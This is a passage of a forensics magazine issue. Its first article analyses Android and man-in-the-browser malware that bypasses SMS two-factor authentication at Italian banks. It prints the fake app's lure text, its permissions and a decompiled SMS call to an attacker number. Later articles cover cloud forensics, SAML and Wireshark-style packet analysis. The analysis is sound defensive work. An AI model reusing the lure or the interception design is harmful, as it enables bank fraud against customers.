TARGETING ITALIAN BANK AND CUSTOMERS
by Davide Cioccia and Senad Aruch

During last few years banks, and different financial institutions,


have been trying to protect or prevent fraud and cyber-attacks
from accessing their customers credentials. They increased
security and login factors to avoid these kind of problems. One
of these is the Two Factor Authentication (2FA), used to help
username and password to protect the bank account.

What you will learn:


How the financial cybercrime is
evolving
How the new security solutions
mobile-based are bypassed
How the attacker can control and
steal your money

What you should know:


A basic knowledge of how the two
factor authentication works
Familiarity with Android/iOS app
requirements
What is a MITB attack

14

owever today, this system is hackable by malicious users. Trend Micros


said:

The attack is designed to bypass a certain two-factor authentication


scheme used by banks. In particular, it bypasses session tokens, which are
frequently sent to users mobile devices via Short Message Service (SMS).
Users are expected to enter a session token to activate banking sessions
so they can authenticate their identities. Since this token is sent through a
separate channel, this method is generally considered secure.
This article is a real User Case of this kind of malicious software. During
our recent malware analysis targeting Italian financial institutions, we found
a very powerful piece of it that can bypass the 2FA with a malicious app installed on the phone. Malware like this can drive the user to download the
fake application on their phone from the official Google Play Store, using a
Man in the browser attack (MITB). Once on the users PC, the attacker can
take full control of the machine and interact with him through a Command and
Control (C&C) server. What we explain in this article is a real active botnet
with at least 40-compromised zombie hosts.
www.eForensicsMag.com

HOW THE 2FA IS BYPASSED

During the last few days, we are seeing criminals developing more sophisticated solutions and have
increasing knowledge in mobile and web programming. This scenario is increasing throughout the entire world; though concentrated mostly in Europe. Criminals are developing solutions to bypass the 2FA
used by the 90% of banks developing legal application published in the Google Play Store and Apple
App Store. These applications can steal information on the phone, intercept and send it over the network
silently. The last operation named Operation Emmenthal, discovered by Trend Micro is acting in just this
way. In this section, we will discover how a criminal can force a user to download and install the mobile
application.
When malware infects the machine, and the user navigates to the online banking platform, a MITB attack starts injecting JavaScript code inside the browser. This injection modifies some data in the page
while keeping the same structure. During the navigation the hacked website will invite the user to download the fake application, explaining all the steps to insert their bogus data. The app can be downloaded
in two different ways:
SMS (inserting your number in the fake form you will receive an SMS with the download link from the store)
Here a screenshot of a received SMS. The fake app name remember many programs used to encrypt
and share sensitive information. People can trust this app because of the name.

Figure 1. Sms sent by attackers to download the apk

QR CODE

A QR Code is showed with a MITB attack, during the online banking website navigation. Here, a screenshot of the image is used to redirect the user on the Google Play Store.

15

www.eForensicsMag.com

Figure 2. QR Code used to download the apk

A case of QR codes is reported by Trend Micro in this image. When the users did not use the SMS or
the link inside the web page a QR-code appears. Scanning it with any QR reader in the store, the user
will be redirect to the Google Play Store to download the app.

Figure 3.

Every single pass is given by the attackers as reported below:


STEP ONE
When the Google Play Store is opened, click on the install button and Accept the app authorization.
Right are requested to send, receive, intercept, SMS, and read/write on the file system.

16

www.eForensicsMag.com

Figure 4.

Description provided by attackers:








Secure sms transmission with asymmetric encryption, totaly automaticaly.


Totaly secure sms.
Private-key infrastructure (PKI).
Comfortable and easy use, one time installation.
This application is created to protect sensetive data received over sms.
Even if the sms is intersepted nothing can be reached from the encrypted text.
The encrypted text can only be decrypted by your personal private key, generated just after the
first launch.
Each key is unique and has its own identification number.
Functionality:



A Keypair is created after first launch.


A unique identification number is granted.
With the Private Key you decrypt messages, received from the trusted saurses.
Send your Private Key Identifiction Number to the organization which wants to send you an encrypted message. The organization encrypts the message with your Private Key and sends the encrypted message to you. ONLY YOU can decrypt the encrypted Message with your Private Key.

Instruction:



Doqnload and install the app.


Launch the aplication.
Waint till your private kay is generated.
Share your Private Key identification number.

The description is full of orthographic errors, and this means that they are not from an English- speaking country.

17

www.eForensicsMag.com

Analyzing the -apk and decompiling it we found the rights requested by the malicious app.
<uses-permission android:name=android.permission.SEND_SMS />
<uses-permission android:name=android.permission.RECEIVE_SMS />
<uses-permission android:name=android.permission.WRITE_EXTERNAL_STORAGE />

STEP TWO
Once installed, you need to open the app on your phone to see a Random Number Generator. Users
need to insert this user inside the online banking account to login inside the portal. Trend Micro says:

At this stage, the users have to enter the password that was generated by the fake app. The app has
a preset list of possible passwords and just randomly chooses one. The Web page, meanwhile, simply
checks if one of those possible passwords was entered. Guessing numbers does not work, the users will
not be able to proceed with the fake banking authentication.

Figure 5.

Installing the Android app allows the attackers to gain full control of the users online banking sessions
because, in reality, it intercepts session tokens sent via SMS to users phones, which are then forwarded to the cybercriminals. The spoofed website allows the attackers to obtain the users login credentials
while the mobile app intercepts real session tokens sent by the banks. As a result, the attackers obtain
everything they need to fake users online banking transactions.
The app waits for an SMS from the user bank, which provides a OTP or a legitimate token .tok. When
they are received, the app hijacks the communication in the background and forwards the stolen data to
a number with an encrypted SMS.
Here a decompiled piece of code used to test the availability of the server:
Settings.sendSms(this, new MessageItem(+39366134xxxx, Hello are you there?))

Communication start with a simple SMS, requesting service availability. When an SMS is received from
a bank number, the interception starts, and an encrypted sms is sent with the stolen information.

18

www.eForensicsMag.com

C&C CENTER FUNCTION DETAILS

During our code analysis we found a link to a JavaScript file used by criminals during the injection process in the MITB attack. Going deeply into the obfuscated code, we found a link to a C&C server where
data is sent. Behind the front-end, which was password protected, we saw a custom control panel used
to control the botnet. Every single bot is represented in a table and is controlled with the panel. The first
screen you can see behind the login panel is a statistic page with the number of compromised hosts.

Figure 6.

In the second one (Logs), there is all the information about the bots. Every single user is cataloged with
these parameters:








Used browser
Last operation on that bot
IP
Login
Password
User
Type (file, flash)
PIN
Action (request data login)

As you can see in the panel showed below, in the C&C Server attackers have all that they need to access an online banking website with stolen credentials. This panel is very powerful because can perform
a request to the infected user to insert another time in his credentials.

Figure 7.

19

www.eForensicsMag.com

Clicking on the icons on the right, it is possible to send the request to a bot.

Figure 8.

Analyzing every single bot it is possible to see more details about them; this, by clicking on the PIN.
The third page is the JS page, used by the attacker to inject code inside the bot browser. To enable the
form, there is a hidden command discovered through the JavaScript code analysis of that page.

Figure 9.

The fourth section is the jabber page, where an attacker can change his XMPP username and password, and the last page is dedicated to set the password for this panel.

Figure 10.
20

www.eForensicsMag.com

Figure 11.

CONCLUSION

The platform used by this hacker is very powerful because it is not only a drop-zone where data is sent,
but it is a real C&C server. They can interact with malware and can send it commands to execute on the
infected machine. This kind of methodology is increasing every day and the attackers have more sophisticated resources like a Windows malware, a malicious Android app, a rogue DNS resolver server,
a phishing Web server with fake bank site pages, and a compromised C&C server. Banks that use this
kind of authentication are exposing users to rogue app.
Today there are a more secure ways to access an online banking portal, like card readers, TAN, Multiple factor authentication, but they are more sophisticated and slow.
We want to move fast, without any single problem and slowdown.
But this is good for our online bank account?

STATISTICS

The attack is alive and the number of the hacked users is increasing every day. We have detected more
than 40 hacked hosts and accounts until now.
REFERENCES

http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp-finding-holes-operation-emmental.pdf

ABOUT THE AUTHORS

Davide Cioccia is a Security Consultant at Reply s.p.a Communication Valley Security Operations Center in Italy. Msc in
Computer Engineering with Master Thesis about a new way to combat the Advanced Persistent Threat and Microsoft Certified
Professional (MCP,MS) he carried out many article about the financial cybercrime, botnet, drop zone and APT.
Key assignments include anti-fraud management, Anti-Phishing services for financial institute, Drop Zone and Malware Analysis, Cyber Intelligence platform development.
E-Mail: davide.cioccia@live.it
Twitter: https://twitter.com/david107
LinkedIn: https://www.linkedin.com/in/davidecioccia
Senad Aruch. Multiple Certified ISMS Professional with 10-year background in: IT Security, IDS and IPS, SIEM, SOC, Network
Forensics, Malware Analyses, ISMS and RISK, Ethical Hacking, Vulnerability Management, Anti Fraud and Cyber Security.
E-Mail: senad.aruc@gmail.com
Blog: www.senadaruc.com
Twitter: https://twitter.com/senadaruch
LinkedIn: https://www.linkedin.com/in/senadaruc

21

www.eForensicsMag.com

AN OVERVIEW OF
CLOUD FORENSICS
by Dejan Lukan

When discussing cloud forensics, were actually talking about


the intersection between cloud computing and network
forensic analysis. Cloud computing basically refers to a network
service that we can interact with over the network; this usually
means that all the work is done by a server somewhere on
the Internet, which might be backed up by physical or virtual
hardware. In recent years, there has been a significant increase
on the use of virtualized environments, which makes it very
probable that our cloud service is running somewhere in a
virtualized environment.

here are many benefits of virtualized servers, which we wont go into


now, but the most prominent ones are definitely low cost, ease of use,
and the ability to move them around in seconds without service downtime. Basically, cloud computing is just a fancy term created by marketing
people, but weve all been using it for years. A good example of cloud computing is an email service where we dont have to install an email client on our
local computer to access our new email and which serves as storage for all
email. Instead, everything is already done by the cloud, the email messages
are stored on the cloud and, even if we switch to a different computer, we only need to login with our web browser and everything is there. Therefore, we
only need an interface with which we can access our cloud application, which
in the previous example is simply a web browser. Cloud computing has many
benefits, but the two most distinct disadvantages are definitely security and
privacy. Since we store all data in our cloud somewhere on the Internet, the
cloud provider has access to our data, and so does an attacker if a breach
occurs in the providers network.
Network forensic analysis is part of the digital forensics branch, which
monitors and analyzes computer network traffic for the purposes of gathering information, collecting legal evidence, or detecting intrusions [1].
When talking about network forensics, were actually talking about the data
that has been transmitted over the network, which might serve as the only
evidence of an intrusion or malicious activity. Obviously thats not always
the case, since an intruder often leaves evidence on the hard disk of the
22

www.eForensicsMag.com

compromised host as well in the form of log files, uploaded malicious files, etc. But when the attacker
is very careful not to leave any traces on the compromised computer, the only evidence that we might
have is in the form of captured network traffic. When capturing network traffic, we most often want to
separate the good data from the bad by extracting useful information from the traffic, such as transmitted files, communication messages, credentials, etc. If we have a lot of disk space available, we can
also store all the traffic to disk and analyze it at a later time if needed, but obviously this requires a
great amount of disk space. Usually we use network forensics to discover security attacks being conducted over the network. We can use a tool like tcpdump or Wireshark to perform network analysis on
the network traffic.

CLOUD COMPUTING

Lets talk a little bit about deployment models of cloud computing, which are described below (summarized after [2]):
Private cloud The services of a private cloud are used only by a single organization and are not
exposed to the public. A private cloud is hosted inside the organization and is behind a firewall, so
the organization has full control of who has access to the cloud infrastructure. The virtual machines
are then still assigned to a limited number of users.
Public cloud The services of a public cloud are exposed to the public and can be used by anyone.
Usually the cloud provider offers a virtualized server with an assigned IP address to the customer.
An example of a public cloud is Amazon Web Services (AWS).
Community cloud The services of a community cloud are used by several organizations to lower
the costs, as compared to a private cloud.
Hybrid cloud The services of a hybrid cloud can be distributed in multiple cloud types. An example of
such a deployment is when sensitive information is kept in private cloud services by an internal application. That application is then connected to the application on a public cloud to extend the application
functionality.
Distributed cloud The services of a distributed cloud are distributed among several machines at
different locations but connected to the same network.
The service models of cloud computing are the following (summarized after [2]):
IaaS (infrastructure as a service) provides the entire infrastructure, including physical/virtual machines, firewalls, load balancers, hypervisors, etc. When using IaaS, were basically outsourcing a
complete traditional IT environment where were renting a complete computer infrastructure that can
be used as a service over the Internet.
PaaS (platform as a service) provides a platform such as operating system, database, web server,
etc. Were renting a platform or an operating system from the cloud provider.
SaaS (software as a service) provides access to the service, but you dont have to manage it because its done by the service provider. When using SaaS, were basically renting the right to use an
application over the Internet.
There are also other service models that we might encounter:
Desktop as a service Were connecting to a desktop operating system over the Internet, which enables us to use it from anywhere. Its also not affected if our own physical laptop gets stolen, because we can still use it.
Storage as a service Were using storage that physically exists on the Internet as it is present locally. This is very often used in cloud computing and is the primary basis of a NAS (network attached storage) system.
Database as a service Here were using a database service installed in the cloud as if it was installed locally. One great benefit of using database as a service is that we can use highly configurable and scalable databases with ease.
Information as a service We can access any data in the cloud by using the defined API as if it was
present locally.
Security as a service This enables the use of security services as if they were implemented locally.
There are other services that exist in the cloud, but weve presented just the most widespread ones that
are used on a daily basis.
23

www.eForensicsMag.com

If we want to start using the cloud, we need to determine which service model we want to use. The decision largely depends on what we want to deploy to the cloud. If we would like to deploy a simple web
application, we might want to choose an SaaS solution, where everything will be managed by the service
provides and we only have to worry about writing the application code. An example of this is writing an
application that can run on Heroku.
We can think of the service models in the term of layers, where the IaaS is the bottom layer, which gives
us the most access to customize most of the needed infrastructure. The PaaS is the middle layer, which
automates certain things, but is less configurable. The top layer is SaaS, which offers the least configuration, but automates a large part of the infrastructure that we need when deploying an application.

CLOUD NETWORK FORENSICS

The first thing that we need to talk about is defining why cloud network forensics is even necessary. The
answer to that is rather simple: because of attackers trying to hack our cloud services. We need to be
notified when hackers are trying to gain access to our cloud infrastructure, platform, or service. Lets
look at an example. Lets imagine that company X is running a service Y in the cloud; the service is very
important and has to be available 24/7. If the service is down for a few hours, it could mean a considerable financial loss for Xs site. When such an attack occurs, the company X must hire a cloud forensics
expert to analyze the available information. The forensic analyzer must look through all the logs on the
compromised service to look for forensic evidence. The forensics analyzer soon discovers that the attack was conducted from the cloud providers network, so he asks the cloud provider to give him the logs
that he needs.
At this point, we must evaluate what logs the forensics investigator needs in order to find our who
was behind the attack. This is where cloud network forensics comes into play. Basically, we need to
take the digital forensics process and apply it to the cloud, where we need to analyze the information
we have about filesystems, processes, registry, network traffic, etc. When collecting the information that
we can analyze, we must know which service model is in use, because collecting the right information
depends on it.
When using different service models, we can access different types of information, as is shown in the
table below [3,4]. If we need additional information from the service model that were using, which are
not specified in the table below, we need to contact the cloud service provider and they can send us the
required information. The table below presents different columns, where the first column contains different layers that we might have access to when using cloud services. The SaaS, PaaS, and IaaS columns
show the access rights we have when using various service models and the last column presents the
information we have available when using a local computer that we have physical access to.
Information

SaaS

PaaS

IaaS

Local

Networking
Storage
Servers
Virtualization
OS
Middleware
Runtime
Data
Application
Access Control

Its evident from the table that, when using a local computer, we have maximum access, which is why
the analysis of a local machine is the most complete. I intentionally didnt use the term easiest, because
thats not true, since when we have maximum access to the computer, there are multiple evidences that
we can collect and analyze. The problem with cloud services is that the evidence needs to be provided
by the CSP (cloud service provider): If we want to get application logs, database logs, or network logs
24

www.eForensicsMag.com

when using the SaaS service model, we need to contact the service provider in order to get it, because
we cant access it by ourselves. Another problem is that the users data is kept together with the data of
other users on the same storage system, so its hard to separate just the data that we need to conduct
an analysis. If two users are using the same web server for hosting a web page, how can we prove that
the servers log contains the data of the user that were after? This is quite a problem when doing a forensic analysis of the cloud service.
Lets describe every entry from the table above, so it will make more sense.
Networking In a local environment, we have access to the network machines, such as switches,
routers, IDS/IPS systems, etc. We can access all of the traffic passing through the network and analyze it as a part of gathering as much data as we possibly can. When using the cloud, even the CSP
doesnt have that kind of data, because it mustnt log all the traffic passing through the network,
since users data is confidential and CSP cant record, store, and analyze it. The CSP might only apply the IDS/IPS solution to the network, which is only analyzing traffic for malicious behavior and
alerting the provider of such activity.
Storage When we have hardware access to the machine, we know exactly where the data is located but, when using a cloud service, the data could be anywhere, even in different states, countries,
or even continents.
Servers In a traditional system, we have physical access to the machine, which is why we can actually go to the machine and analyze the data on it; all the data is local to the machine. This isnt
possible when using the cloud, because the data is dispersed through multiple data centers and its
hard to confirm that weve actually collected all the needed data.
Virtualization In a local environment, we have access to the virtualization environment, where we
can access the hypervisor, manage existing virtual machines, delete a virtual machine, or create a
new virtual machine. In the public cloud, we normally dont have access to the hypervisor, but if we
absolutely must have access, we can run a private cloud.
OS In a local environment, we have complete access to the operating system as we do in the IaaS
model, but not in the PaaS and SaaS models. If we want access to the operating system, we could
connect to the SSH service running on the server and issue OS commands, which we cant do
when using Heroku, for example.
Middleware The middleware connects two separate endpoints, which together form a whole application. For example, we might have a database running on a backend systems and the web application connects to those databases by using different techniques.
Runtime When using the IaaS model, we can influence how the application is started and stopped,
so we have access to its runtime.
Data/application In PaaS and IaaS models, we have access to all of the data and applications,
which we can manage by using search, delete, add, etc. We cant do that directly when using the
SaaS model.
Access control In all service models, we have access to the access control because, without it, we
wouldnt have been able to access the service. We can control how access is granted to different
users of the application.
When conducting forensic analysis in the traditional way, we can simply hire a forensics expert to collect
all the data and analyze it from the local machine. In a cloud service, we can do the same, but we must
also cooperate with the cloud service provider, which might not have the forensics experts available or
simply might not care and therefore wont provide us with all the data that we need.

CONCLUSION

In this article, weve seen that, when conducting a cloud network forensic analysis, we do not have access to the same information as we do when conducting an analysis of a normal local computer system.
We often do not have access to the information that were after and must ask the cloud service provider
to furnish the information we need. The problem with such data is that we must trust the cloud service
provider to give us the right information; they might give us false information or hold back some very important information. This is just another problem when trying to use the data in court, because we must
prove without a doubt that the evidence from the collected data belongs to the user; the process of collecting the data, preserving it, and analyzing it must be documented and acceptable in the court of law.

25

www.eForensicsMag.com

When an attack has occurred on a cloud service, there are a lot of different problems we need to address, but the most important of them is communication with our cloud service provider. Because the
services are located in the cloud, there is a lot of information that could serve as evidence which can only
be provided by the CSP, since only the cloud provider has access to it. Therefore, there are also other
problems with gathering the data when working with cloud environments, such as data being located in
multiple data centers located around the globe, data of different users being located in the same storage
device, etc.
There is still a lot of research that must be done in order to improve forensic examination of cloud services. There is also a lack of professional cloud forensic experts, which are expected to increase in the
next couple of years.
REFERENCES

[1] Gary Palmer, A Road Map for Digital Forensic Research, Report from DFRWS 2001, First Digital Forensic Research Workshop, Utica,
New York, August 7 8, 2001, Page(s) 2730.
[2] Cloud computing, Wikipedia, https://en.wikipedia.org/wiki/Cloud_computing.
[3] Digital Forensics in the Cloud, Shams Zawoad, University of Alabama at Birmingham, Ragib Hasan, University of Alabama at Birmingham.
[4] Pentest Magazine, Vol.1, No.4, Issue 04/2011(04) August, Aaron Bryson, Great Pen Test Coverage: Too Close For Missiles, Switching
to Bullets.

ABOUT THE AUTHOR

Dejan Lukan is a security researcher for InfoSec Institute and penetration tester from Slovenia. He is very interested in finding
new bugs in real world software products with source code analysis, fuzzing and reverse engineering. He also has a great passion for developing his own simple scripts for security related problems and learning about new hacking techniques. He knows
a great deal about programming languages, as he can write in couple of dozen of them.

26

www.eForensicsMag.com

AUTHENTICATING
REMOTE ACCESS FOR
GREATER CLOUD
SECURITY
by David Hald, co-founder, chief relation officer

The nature and pace of business have changed as technology


has opened new possibilities for organizations. One of these
possibilities is cloud services, which benefit companies by
enabling remote access to data stored offsite. Its convenience
has made cloud services incredibly popular, both to business and
malicious actors. With so much data at stake, the rise in the use
of remote access necessitates ironclad security. Authenticating
the identities of users remotely accessing these resources has
never been more critical.

ccording to Javelin Strategy & Researchs 2014 Identity Fraud Study,


a new identity fraud victim was hit every two seconds in America last
year, an increase of over half a million people since 2012.

Despite the rise in identity and data theft, many authentication methods still
rely on usernames and passwords to protect employees, customers and data. Todays cybercriminals are increasingly sophisticated in their attacks, and
yesterdays authentication methods are simply inadequate.

SECURITY NEEDS HAVE CHANGED

Organizations are granting access to cloud-based business solutions such as


Microsoft Office 365, Salesforce and Google Apps to an increasing number of
end-users. Some cloud solutions offer generic security measures for authenticating users who access these systems in the cloud. This approach gives
the end-user the responsibility of choosing what type of security to use and
forces the user to rely on personal judgment to determine whether the security is strong enough to protect access effectively.
27

www.eForensicsMag.com

It has become increasingly obvious that usernames and passwords are ineffective ways of authenticating access, yet their use is still widespread as users balk at more cumbersome forms of authentication
like tokens and certificates. While simple user names and passwords are no longer effective, the amount
of data stored in the cloud continues to escalate. Cloud providers must accommodate access to millions
of users from all over the world. A centralized breach in a cloud-based solution would pose a serious risk
to the data of thousands if not more organizations. Therefore, end-users should select cloud providers that offer strong, flexible security that is extremely hard to compromise yet easy to use.

A CENTRALIZED SECURITY APPROACH

In light of the increasing need for stronger security for cloud access, businesses have begun to implement
standards for authenticating users. One of the major problems organizations face is how to manage user
identities in the cloud. To manage cloud identities, IT departments must often maintain an additional set of
user credentials for each and every cloud solution used by their employees. This approach requires cumbersome procedures and extra work for IT. To bypass this problem, IT should use a centralized method that
gives each user a single identity that provides access to a variety of different cloud solutions.
A centralized method like this ensures that those who access an organizations assets have been prequalified. It provides strong authentication while also freeing end-users from being dependent on specific
software, hardware or features for greater flexibility and convenience.

SAVING TIME WITH SAML

With the ability to allow secure Web domains to exchange user authentication and authorization data,
Security Assertion Markup Language, or SAML, is one way to provide effective and easy identity management in the cloud. A SAML setup requires three roles: the end-user, the service provider and the identity provider. The service provider role is held by cloud solutions, such as Microsoft Office 365, Salesforce
or Google Apps. The identity provider role handles user authentication and identity management for the
service provider, and can be used as a centralized system to handle authentication and identity management for multiple service providers at once. By using a SAML identity provider, organizations can gain all
the recognized benefits that are traditionally associated with on-premise authentication solutions.
SAML frees organizations from having to maintain multiple instances of user credentials, one in the local area network (LAN) and multiple in the cloud. In this way, SAML is a time saver. This way, the organization can keep its authentication and security mechanisms the same for all users, regardless of whether
they are accessing data in the cloud or on the LAN, thus saving time and money while boosting security.

MAKE SECURE AUTHENTICATION YOUR GOAL

Cloud services offer convenient remote access to organizations, but they can also open the door for
identity theft if the cloud security system relies on outdated methods such as usernames and passwords.
The threat is real, and growing, so organizations must scrutinize the security that a cloud provider offers
before closing a deal and make secure, authenticated cloud access for end-users their goal regardless
of whether its offered by the cloud provider. For their part, cloud providers must make it their goal to create a secure and easy-to-use authentication method. The stakes are too high not to.
ABOUT THE AUTHOR

David Hald is a founding member of SMS PASSCODE A/S, where he acts as a liaison and a promoter of the
award-winning SMS PASSCODE multi-factor authentication solutions. Prior to founding SMS PASSCODE
A/S, he was a co-founder and CEO of Conecto A/S, a leading consulting company within the area of mobile- and security solutions with special emphasis on Citrix, Blackberry and other advanced mobile solutions.
In Conecto A/S David has worked with strategic and tactic implementation in many large IT-projects. David
has also been CTO in companies funded by Teknologisk Innovation and Vkstfonden. Prior to founding
Conecto, he has worked as a software developer and project manager, and has headed up his own software
consulting company. David has a technical background from the Computer Science Institute of Copenhagen
University (DIKU).

28

www.eForensicsMag.com

PACKET ANALYSIS
WITH WIRESHARK AND
PCAP ANALYSIS TOOLS
by Eric A. Vanderburg

Almost every computer today is connected. Their communication


with others takes the form of packets which can be analyzed to
determine the facts of a case. Packet sniffers are also called as
network analyzers as it helps in monitoring every activity that is
performed over the Internet. The information from packet sniffing
can be used to analyze the data packets that uncover the source
of problems in the network. The important feature of packet
sniffing is that it captures data that travels through the network,
irrespective of the destination. A log file will be generated at the
end of every operation performed by the packet sniffer and the
log file will contain the information related to the packets.

very packet has a header and body, where the header contains information about the source of the packet and the body contains the actual
information about the transfer. There are packet sniffer tools that are
available online and many of them are open source tools and hence they are
available free of cost. How, when and where should this be performed to collect the best data in a defensible manner? Attend this workshop to find out.

WHAT IS PACKET ANALYSIS?

Investigations cannot always be contained to a single computer, especially


with the way systems are connected these days. Right now, your computer
may be connected to dozens of different computers, some to check for software updates, others to gather tweets, email, or RSS feeds. Some connections could be used to authenticate to a domain or access network resources.
Now consider an investigation and the potential importance this information
could have to it.

29

www.eForensicsMag.com

Network communication over an Internet Protocol (IP) network can best be understood as a set of
packets that form a communication stream. A machine may send and receive thousands of packets per
minute and computer networks are used to send these packets to their destination. Packet capture tools
can be used to analyze this communication to determine how a computer or user interacted with other
devices on the network. Packet analysis can capture these packets so that they can be reviewed to determine what communication took place.
Packet analysis is called as packet sniffing or protocol analysis. A tool that is used for packet analysis is
called packet sniffer or packet capture tool. It captures raw data across the wire which helps in analyzing
which parties are communicating on the network, what data is flowing, how much data is being transmitted and what network services are in use.

PACKET SNIFFING PROCESS

Packet sniffing can be divided into three steps. The first step is collection when the software gathers all
data traversing the network card it is bound to. Next, the data is converted to a form that the program can
read and lastly, the program presents the data to be analyzed and can perform pre-programmed analysis techniques on the data.

OSI NETWORK MODEL

Before you can analyze packets, you need to understand how network communication takes place.
The OSI network model is a conceptual framework that describes that activities performed to communicate on a network.

TOOLS

There are various packet sniffing tools available on the market. Some popular packet capture tools include Wireshark, Network Miner and NetWitness Investigator, which we will see in detail. All three of
these tools are free to download and use and they can be operated in both command line program format and GUI format.
Of the three, Wireshark is the most popular packet sniffer tool that is used worldwide for its ease of
installation, ease of use, etc. More importantly, it is an open source tool that is available free of cost.
The tool also provides advanced options that will enable forensic investigator or network administrators
to delve deep in the packets and capture information. It supports operating systems and numerous protocols, and media types.
There are numerous packet sniffer tools available for network administrators to analyze and understand the traffic flow across the network. It is always difficult to zero down on the best of the lot as almost
of them perform required functions seamlessly. Still, there are factors in which they can be ranked and
classified as the top packet sniffing tools. The following three tools are identified to be the best in the market, already serving millions of computers from identifying serious threats. Lets get in detail with each of
the three packet sniffing tools and understand why they are ranked in such order.

WIRESHARK

Wireshark is a popular open source packet sniffer that performs functions such as network troubleshooting,
data analysis, protocol development, etc. The tool uses latest available platforms and forensic investigator
or network administrator interface toolkit for serving network administrators. The development version of
Wireshark uses Qt while the current releases use GTK+ toolkit. The major advantage of using Wireshark
is that it supports multiple platforms, operating systems and protocols. Wireshark comes in both graphical forensic investigator or network administrator interface format and command mode format. Wireshark
includes network interface controllers that make it possible for the traffic flowing across the network to be
captured via packets. Otherwise, only specified data that is routed to a destination will be captured.
Wireshark supports various protocols and media types. The approximate number of protocols supported by Wireshark is more than 900, and this count goes on increasing as and when an update is released. The primary reason for the increase in count of supported protocols is the open source nature
of the tool. Developer has the freedom to develop code for including their new protocol into Wireshark.
The Wireshark development team reviews the code that you send and include them in the tool.
This makes it possible for protocol to be supported by Wireshark. Also, Wireshark supports major operating systems ranging from Windows; MAC to Linux-based operating systems.
30

www.eForensicsMag.com

The other major reason for Wireshark to remain on top of a users list of best packet sniffers is its ease
of use. The graphical user interface of the tool is one of the simplest and easiest, available in the online
world. The menus are clear with a simple layout, and raw data are represented graphically. This makes
it easier for novices to get along with the tool in the early stages of their career. The common problem
that users face when using open source software is a lack of proper program support. Wireshark has a
highly active forensic investigator or network administrator community that can be ranked as the best
among the open source projects. The development team also provides an email subscription of forensic
investigator or network administrators on latest updates and FAQs.
Wireshark is very easy to install, and the required system configuration is very minimal as well. Wireshark requires a minimum of 400 MHz of processor speed and 60 MB of free storage. The system should
have WinPCap capture driver and a network interface card that supports promiscuous mode and this
requires user to have administrator access on the system being used.
Once you are sure that your system has the given configuration, you can install the tool in very short
time. Since there will not be data for the first time you open Wireshark, it will not be easier to judge the
forensic investigator or network administrator interface.
Installing Wireshark tool is as simple as installing other software in the Windows system. All you need
to do is double click the executable file for the installer to open up. Agree to the terms and conditions and
select the components you need to be installed along with the packet sniffing tool. Certain components
are selected by default, and they are enough for basic operations. Ensure that you select the Install WinPCap option and verify that the WinPCap installation window is displayed some time after Wireshark
main installation has started. When the installation is complete, open the tool and select Capture button
from the main drop down menu and select interfaces from which you need data to be captured. This will
initiate your first data capture using Wireshark, and the main window will then be filled with data that can
be used by the user.

Figure 1. Home Window of Wireshark

31

www.eForensicsMag.com

Figure 2. Selecting Interfaces

The main window of Wireshark is where the data that are collected are presented to the forensic investigator or network administrator. Hence, this will be a place where most of the time in the tool will be
spent. The main window is broken down into three panes that are interlinked with each other.
The three panes are packet list pane, packet details pane and packet bytes pane. The packet list displays the packets that are available for forensic investigator or network administrator analysis. On selecting packet, the corresponding packet details are displayed in the packet details pane. The corresponding
size of the packets will be displayed in the packet bytes pane. The packet list pane displays the packet
number and the time at which the packet was captured by the tool. It also displays the source and destination of the packet and other information related to the packet such as packet protocol, etc. The packet
bytes pane displays the raw data in the same form as it was originally captured and cannot be of more
use. More information about Wireshark can be found at https://www.wireshark.org/. The tool can also be
downloaded from the site.

Figure 3. Main Window

NETWORK MINER

Network Miner is a packet analysis tool that also includes the ability to perform packet sniffing. It is available for Windows, Linux and MAC OS. It is passive packet capturing tool that detects operating systems,
traffic, and network ports. On the contrary, Wireshark is an active packet capturing tool.
32

www.eForensicsMag.com

The difference between an active and passive packet sniffing tool is that in active sniffing, the sniffing
tool sends the request over the network and uses the response to capture packets while passive sniffing does not send request for receiving a response. It simply scans the traffic without getting noticed in
the network.
The places where passive sniffing comes in handy are radar systems, telecommunication and medical
equipment, and many others. Another difference between active and passive sniffing technique is that
the latter uses host-centric approach which means it uses hosts for sorting out data while active sniffing
uses packets. Similar to Wireshark, network miner also comes with easy to use interface, simple installation and ease of use.

NETWITNESS INVESTIGATOR

The NetWitness Investigator is the packet sniffing tool that is a result of 10 years of research and development has been used in most complex threat environments. The Netwitness investigator has been
used only with critical environments for so long, but the company has released the free version of the
software, making it available for the public as well. The investigator captures live packets from both wireless and wired network interfaces. It supports most major packet capture systems. The free version of
the tool allows 25 simultaneous users to capture data up to a maximum of 1 GB.
The tool has other interesting features such as effectively analyzing the data in layers of networking,
from users email addresses, files, IPv6 support, full content searching, exporting the information collected in PCAP format, and others. As the number of users using the internet has grown over the years, it
was important for the Internet Engineering Task Force to come up with unique IP addresses that can be
used for new devices. IPv6 will replace the current generation IPv4 protocol. The introduction of IPv6
allows increased number of IP addresses which helps more users to communicate over the internet.
This is because, IPv4 addresses are only 32 bits long that supports 4.3 billion addresses whereas
IPv6 addresses are 128 bits long and supports over hundred trillion and trillion addresses. With new
set of protocols used for communication, it is important for the forensic tools to provide support for
the protocols for seamless operation. NetWitness Investigator thus provides support for IPv6 which
will be the future of all internet communication. Every new release of the tool comes in which many
new features that may not be available in other packet sniffing tool. Netwitness investigator requires
certain minimum configuration support for installation. The tool can be installed in windows operating system, with at least 1 GB RAM, 1 Ethernet port, a large amount of data storage, etc. The free
version of the tool supports only the Windows operating system while the commercial version provides support for Linux as well. One important feature of investigator is that it does not alert forensic
investigator or network administrators for problems in network based on known threats. Instead, it
catches packets in real time and analyzes the network for differences in behavior and reports the
same to the forensic investigator or network administrator immediately. The commercial version of
the software brings in more benefits when compared to the free version. Some of the features that
are present only in enterprise version are support for Linux platform, remote network monitoring, informer, decoder and automated reporting engine.

HOW PACKET ANALYZERS WORK

Packet analyzers intercept network traffic that travel through the wired and wireless network interfaces
that they have access to. The structure of the network along with how network switches and other tools
are configured decides what information can be captured. In a switched wired network, the sniffer can
capture data from only the switch port it is attached to unless port mirroring is implemented on the switch.
However, with wireless, the packet sniffing tool can capture data from only one channel, unless there
are multiple interfaces that allow data to be captured from more than one channel. RFC 5474 is a framework that is used for selection of packets and reporting them. It uses the PSAMP framework which selects packets in statistical methods and exports the packets to the collectors. RFC 5475 describes the
various techniques of packet selection that are supported by PSAMP. These frameworks help users perform the processes seamlessly.
The data that is received initially willbe in raw format that only the software can understand. It needs
to be converted to human readable form for the forensic investigator or network administrator to interpret. The tool performs this operation in the process called conversion. The data can then be analyzed,
